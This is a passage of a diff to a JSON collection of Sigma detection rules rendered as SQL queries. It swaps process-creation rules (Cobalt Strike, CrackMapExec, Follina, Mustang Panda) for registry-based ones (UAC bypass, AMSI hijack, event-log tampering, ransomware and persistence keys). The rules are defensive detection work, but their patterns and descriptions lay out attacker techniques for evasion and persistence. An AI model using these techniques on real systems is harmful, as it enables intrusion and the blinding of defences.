ESCAPE '\\' AND ParentImage LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\runonce.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1%' ESCAPE '\\' AND (ParentCommandLine LIKE '%/C whoami%' ESCAPE '\\' OR ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Internet Download Manager\\\\IDMMsgHost.exe%' ESCAPE '\\' OR ParentCommandLine LIKE '%chrome-extension://%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" + "filename": "registry_set_uac_bypass_eventvwr.yml" }, { - "title": "Pingback Backdoor Activity", - "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", - "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential AMSI COM Server Hijacking", + "id": "160d2780-31f7-4922-8b3a-efce30e63e96", + "status": "experimental", + "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_pingback_backdoor.yml" + "filename": "registry_set_amsi_com_hijack.yml" }, { - "title": "Mshtml DLL RunHTMLApplication Abuse", - "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", - "status": "experimental", - "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Blackbyte Ransomware Registry", + "id": "83314318-052a-4c90-a1ad-660ece38d276", + "status": "test", + "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" + "filename": "registry_set_blackbyte_ransomware.yml" }, { - "title": "Suspicious Script Execution From Temp Folder", - "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "title": "Disable Windows Event Logging Via Registry", + "id": "2f78da12-f7c7-430b-8b19-a28f269b77a3", "status": "experimental", - "description": "Detects a suspicious script executions from temporary folder", - "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", + "description": "Detects tampering with the \"Enabled\" registry key in order to disable windows logging of a windows event channel", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Administrative scripts" + "Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Enabled' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE '%\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-FileInfoMinifilter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-ASN1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Kernel-AppCompat\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Runtime\\\\Error\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-CAPI2/Operational\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Compat-Appraiser%' ESCAPE '\\'))) AND NOT ((Image = '') OR (Image = '')))" ], - "filename": "proc_creation_win_susp_script_exec_from_temp.yml" + "filename": "registry_set_disable_winevt_logging.yml" }, { - "title": "PowerShell Base64 Encoded Reflective Assembly Load", - "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", - "status": "test", - "description": "Detects base64 encoded .NET reflective loading of Assembly", - "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", + "title": "Change Winevt Event Access Permission Via Registry", + "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", + "status": "experimental", + "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027", - "attack.t1620" + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (Details LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR Details LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR Details LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_base64_reflective_assembly_load.yml" + "filename": "registry_set_change_winevt_channelaccess.yml" }, { - "title": "Execute Pcwrun.EXE To Leverage Follina", - "id": "6004abd0-afa4-4557-ba90-49d172e0a299", + "title": "Potential Persistence Via Excel Add-in - Registry", + "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", "status": "experimental", - "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND Details LIKE '/R %' ESCAPE '\\' AND Details LIKE '%.xll' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" + "filename": "registry_set_persistence_xll.yml" }, { - "title": "HackTool - CrackMapExec Execution", - "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", - "status": "test", - "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", - "author": "Florian Roth (Nextron Systems)", + "title": "Add Debugger Entry To Hangs Key For Persistence", + "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "status": "experimental", + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence" + ], "falsepositives": [ - "Unknown" + "This value is not set by default but could be rarly used by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" + "filename": "registry_set_hangs_debugger_persistence.yml" }, { - "title": "Process Memory Dumped Via RdrLeakDiag.EXE", - "id": "6355a919-2e97-4285-a673-74645566340d", - "status": "experimental", - "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Environment Variable Has Been Registered", + "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", + "status": "test", + "description": "Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' AND CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\') OR (CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\' AND CommandLine LIKE '% /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (Details IN ('powershell', 'pwsh') OR (Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR Details LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR Details LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR Details LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%SW52b2tlL%' ESCAPE '\\' OR Details LIKE '%ludm9rZS%' ESCAPE '\\' OR Details LIKE '%JbnZva2Ut%' ESCAPE '\\' OR Details LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR Details LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR Details LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (Details LIKE 'SUVY%' ESCAPE '\\' OR Details LIKE 'SQBFAF%' ESCAPE '\\' OR Details LIKE 'SQBuAH%' ESCAPE '\\' OR Details LIKE 'cwBhA%' ESCAPE '\\' OR Details LIKE 'aWV4%' ESCAPE '\\' OR Details LIKE 'aQBlA%' ESCAPE '\\' OR Details LIKE 'R2V0%' ESCAPE '\\' OR Details LIKE 'dmFy%' ESCAPE '\\' OR Details LIKE 'dgBhA%' ESCAPE '\\' OR Details LIKE 'dXNpbm%' ESCAPE '\\' OR Details LIKE 'H4sIA%' ESCAPE '\\' OR Details LIKE 'Y21k%' ESCAPE '\\' OR Details LIKE 'cABhAH%' ESCAPE '\\' OR Details LIKE 'Qzpc%' ESCAPE '\\' OR Details LIKE 'Yzpc%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_rdrleakdiag.yml" + "filename": "registry_set_suspicious_env_variables.yml" }, { - "title": "Suspicious Regsvr32 Execution From Remote Share", - "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "title": "Potential Persistence Via Outlook Home Page", + "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", "status": "experimental", - "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential persistence activity via outlook home pages.", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_remote_share.yml" + "filename": "registry_set_persistence_outlook_homepage.yml" }, { - "title": "Copy From VolumeShadowCopy Via Cmd.EXE", - "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", - "status": "experimental", - "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "UAC Bypass Using Windows Media Player - Registry", + "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Backup scenarios using the commandline" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND Details = 'Binary Data')" ], - "filename": "proc_creation_win_cmd_shadowcopy_access.yml" + "filename": "registry_set_uac_bypass_wmp.yml" }, { - "title": "Fsutil Suspicious Invocation", - "id": "add64136-62e5-48ea-807e-88638d02df1e", - "status": "stable", - "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", - "author": "Ecco, E.M. Anhaus, oscd.community", + "title": "Scheduled TaskCache Change by Uncommon Program", + "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", + "status": "experimental", + "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", + "author": "Syed Hasan (@syedhasan009)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (Image = 'System')))" ], - "filename": "proc_creation_win_fsutil_usage.yml" + "filename": "registry_set_taskcache_entry.yml" }, { - "title": "Mustang Panda Dropper", - "id": "2d87d610-d760-45ee-a7e6-7a6f2a65de00", + "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", + "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", "status": "test", - "description": "Detects specific process parameters as used by Mustang Panda droppers", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", + "author": "frack113", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.persistence", + "attack.t1133" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Temp\\\\wtask.exe /create%' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-3,1\\%\\%PUBLIC:~-9,1\\%%' ESCAPE '\\' OR CommandLine LIKE '%/tn \"Security Script %' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-1,1\\%%' ESCAPE '\\') OR (CommandLine LIKE '%/E:vbscript%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\' AND CommandLine LIKE '%/F%' ESCAPE '\\') OR Image LIKE '%Temp\\\\winwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE 